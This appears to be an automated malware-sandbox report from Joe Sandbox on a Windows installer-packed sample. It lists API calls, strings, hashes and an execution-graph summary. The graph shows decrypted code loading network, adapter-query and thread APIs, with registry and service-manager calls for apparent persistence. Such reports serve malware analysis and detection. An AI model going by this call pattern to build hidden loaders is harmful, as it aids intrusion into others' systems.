• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• API String ID: 4283692357-0
• Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
• Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
• Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
• Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                    • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                    • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                    • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocHandleLockUnlock
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                    Strings
                                                                                                    • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                    • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                    • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                    Strings
                                                                                                    • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveForeground
                                                                                                    • String ID: Will not restart Windows automatically.
                                                                                                    APIs
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                    • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                    Strings
                                                                                                    • Extracting temporary file: , xrefs: 004763EC
                                                                                                    Similarity
                                                                                                    • API ID: FileTime$Local
                                                                                                    • String ID: Extracting temporary file:
                                                                                                    Strings
                                                                                                    • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                    • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                    • %s\%s_is1, xrefs: 00478F10
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                    • API String ID: 47109696-1598650737
                                                                                                    • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                    • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                    • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                    • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                    • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMessageSendShell
                                                                                                    • String ID: open
                                                                                                    • API String ID: 812272486-2758837156
                                                                                                    • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                    • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                    • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                    • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                    APIs
                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                    • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                    • String ID: <
                                                                                                    • API String ID: 893404051-4251816714
                                                                                                    • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                    • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                    • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                    • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                      • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                    • String ID: )
                                                                                                    • API String ID: 2227675388-1084416617
                                                                                                    • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                    • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                    • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                    • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window
                                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                                    • API String ID: 2353593579-4169826103
                                                                                                    • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                    • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                    • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                    • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocByteCharFreeMultiWide
                                                                                                    • String ID: NIL Interface Exception$Unknown Method
                                                                                                    • API String ID: 3952431833-1023667238
                                                                                                    • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                    • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                    • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                    • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                    • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                      • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                                    • String ID: 0nI
                                                                                                    • API String ID: 3798668922-794067871
                                                                                                    • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                    • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                    • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                    • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$EnumQuery
                                                                                                    • String ID: Inno Setup: No Icons
                                                                                                    • API String ID: 1576479698-2016326496
                                                                                                    • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                    • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                    • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                    • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                    APIs
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID: T$H
• API String ID: 1799206407-488339322
• Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
• Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
• Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
• Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
APIs
• DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
• GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: T$H
• API String ID: 2018770650-488339322
• Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
• Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
• Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
• Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
APIs
• RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
• GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID: T$H
• API String ID: 377330604-488339322
• Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
• Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
• Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
• Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
APIs
  • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(6EA10000,00481A2F), ref: 0047D0E2
  • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
  • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
• GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
• TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
Strings
• Detected restart. Removing temporary directory., xrefs: 00498013
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
• String ID: Detected restart. Removing temporary directory.
• API String ID: 1717587489-3199836293
• Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
• Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
• Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
• Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
APIs
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorLastSleep
• String ID:
• API String ID: 1458359878-0
• Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
• Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
• Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
• Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

Execution Graph

Execution Coverage: 2.5%
Dynamic/Decrypted Code Coverage: 70.2%
Signature Coverage: 17.9%
Total number of Nodes: 463
Total number of Limit Nodes: 22
execution_graph: the interactive execution graph (463 nodes: node id, code address, API or runtime function name, and node->node edges) was exported as one run of text and is summarised here. Nodes at 0x40xxxx addresses (the on-disk image) reference: FindResourceA, SizeofResource, LoadResource, LockResource, GlobalAlloc, GetTickCount, OpenSCManagerA, CopyFileA, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegCreateKeyExA, RegCloseKey, CreateDirectoryA, LoadLibraryExA, lstrcmpiW, Sleep, GetVersion, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, VirtualAlloc, VirtualFree, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, GetModuleFileNameA, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetStdHandle, GetFileType, SetHandleCount, GetCurrentProcess, TerminateProcess, ExitProcess, UnhandledExceptionFilter.
Nodes at 0x2d4xxxx-0x2ddxxxx addresses (dynamic/decrypted code) reference: LoadLibraryA, GetProcAddress, FreeLibrary, GetAdaptersInfo, CreateFileA, DeviceIoControl, CloseHandle, GetLastError, WriteFile, SHGetSpecialFolderPathA, WSAStartup, InternetOpenA, CreateThread, InterlockedIncrement, InterlockedExchange, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetVersionExA, GetTickCount, QueryPerformanceCounter, Sleep, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, GetProcessHeap, RtlAllocateHeap, HeapFree, RtlEncodePointer, RtlDecodePointer, RaiseException, GetModuleHandleExW, ExitProcess, TlsAlloc, TlsGetValue, TlsSetValue, GetStartupInfoW, GetStdHandle, GetFileType, GetModuleFileNameA, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, plus CRT helpers (_malloc, _free, _memset, _sprintf, _swscanf, _strtok, _strlen, __getptd_noexit, __CRT_INIT@12, ___DllMainCRTStartup, _doexit, __NMSG_WRITE, ___crtCorExitProcess, std::exception::exception, shared_ptr).

                                                                                                    Control-flow Graph
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.NTDLL(02D74FC8), ref: 02D45E83
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45E9A
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EA3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EB2
